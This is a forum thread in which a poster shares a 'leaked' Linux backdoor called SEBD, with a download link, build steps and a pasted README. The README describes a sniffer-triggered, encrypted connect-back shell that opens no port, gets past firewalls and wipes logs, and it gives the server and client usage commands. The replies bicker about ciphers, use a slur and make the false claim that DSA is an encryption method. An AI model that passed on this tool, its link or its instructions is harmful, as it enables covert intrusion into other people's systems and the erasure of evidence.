Login Register






The issue regarding searched threads returning 404s has been fixed. My apologies. - NekoElf
The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.
Thread Rating:
  • 3 Vote(s) - 3.33 Average


Leak SEBD - Simple Encrypted Backdoor for Linux filter_list
Author
Message
SEBD - Simple Encrypted Backdoor for Linux #1
http://mybb.rsadvance.net/sebd-0.2-new.tgz

I found this on an excursion to the land of EFnet and decided I'd share it.
This is an interesting little backdoor for Linux and other Unix-like OSes and I'll be writing a tutorial on how to use it soon. Watch this space. Should be up by tomorrow.
Until then, have a c/p from the README file.

Quote:[23:48:24] Oni | SL: So I could set it to 80 on box running apache/nginx?
[23:48:36] Oni | SL: on a*
[23:48:40] Starfall: it "listens on all ports" using a pcap-based sniffer
[23:48:47] Starfall: the SERVER_PORT is the port you're receiving the back connect shell on
[23:48:49] Oni | SL: Ah.
Instructions for compiling: ./configure;make
Configure script does all the editing config.h for you, I removed that bit after realizing that.

slider Wrote:sebd v0.1 (simple encrypted backdoor)

sebd is another linux backdoor.

what does sebd provide:
- a raw sniffer
- aes encrypted shell
- full tty/pty support
- connect back (bypass moust of the firewall's)
- does not open a port
- you can log in on any opened port
- cleans the logs (wipes out the ip from where the sniffer received the password)
- tcpd function (if the pasword is from an ip that isn't in the list -> no shell)
- password is encrypted with DES (hardcoded only in the server binary)

usage:

on the server host run: ./sebd
on the client host run: ./client -h host|ip -d port

AUTHOR: slider
EMAIL: slider@go.ro

PS: check out the CREDITS...it's only a hack
PGP
Sign: F202 79C9 76F7 40BB 54EC 494F 5DEF 1D70 14C1 C4CC
Encrypt: A5B3 1B21 55E1 80AF 4C6E DE83 467B 8EFC 3DEE 681C
Auth: CD55 E8A5 1A08 2933 8BA6 BC88 D81F 1943 739A 3C47

Reply

RE: SEBD - Simple Encrypted Backdoor for Linux #2
Quote:- password is encrypted with DES (hardcoded only in the server binary)

fgt use 3des

Reply

RE: SEBD - Simple Encrypted Backdoor for Linux #3
(10-01-2013, 05:47 AM)Cyanide and Cynicism Wrote: fgt use 3des

For those that are too lazy to Google, DES is an older form of encryption (with a small key size). 3DES is similar, but instead involves combining 3 instances of DES.

3DES > DES

Read More: http://www.cs.wustl.edu/~jain/cse567-06/...x.html#2_5
[Image: fSEZXPs.png]

Reply

RE: SEBD - Simple Encrypted Backdoor for Linux #4
Bumping with fixed link. Had a complaint that it wasn't working.
PGP
Sign: F202 79C9 76F7 40BB 54EC 494F 5DEF 1D70 14C1 C4CC
Encrypt: A5B3 1B21 55E1 80AF 4C6E DE83 467B 8EFC 3DEE 681C
Auth: CD55 E8A5 1A08 2933 8BA6 BC88 D81F 1943 739A 3C47

Reply

RE: SEBD - Simple Encrypted Backdoor for Linux #5
helpful thread . thanks .
[Image: qO7wjaH.png]


Reply

RE: SEBD - Simple Encrypted Backdoor for Linux #6
(10-01-2013, 05:47 AM)Cyanide and Cynicism Wrote: fgt use 3des

fgt, encrypt it with dsa, so gud.

Reply

RE: SEBD - Simple Encrypted Backdoor for Linux #7
(10-23-2013, 05:48 AM)w00t Wrote: fgt, encrypt it with dsa, so gud.

Encrypt it with AES.

Reply

RE: SEBD - Simple Encrypted Backdoor for Linux #8
dsa encreption much better thn aes

Reply

RE: SEBD - Simple Encrypted Backdoor for Linux #9
(11-03-2013, 05:06 PM)w00t Wrote: dsa encreption much better thn aes

3des is master race.

Reply

RE: SEBD - Simple Encrypted Backdoor for Linux #10
(11-03-2013, 05:06 PM)w00t Wrote: dsa encreption much better thn aes

DSA stands for "Digital Signature Algorithm" and is specifically designed to produce digital signatures, not perform encryption.

Reply







Users browsing this thread: 1 Guest(s)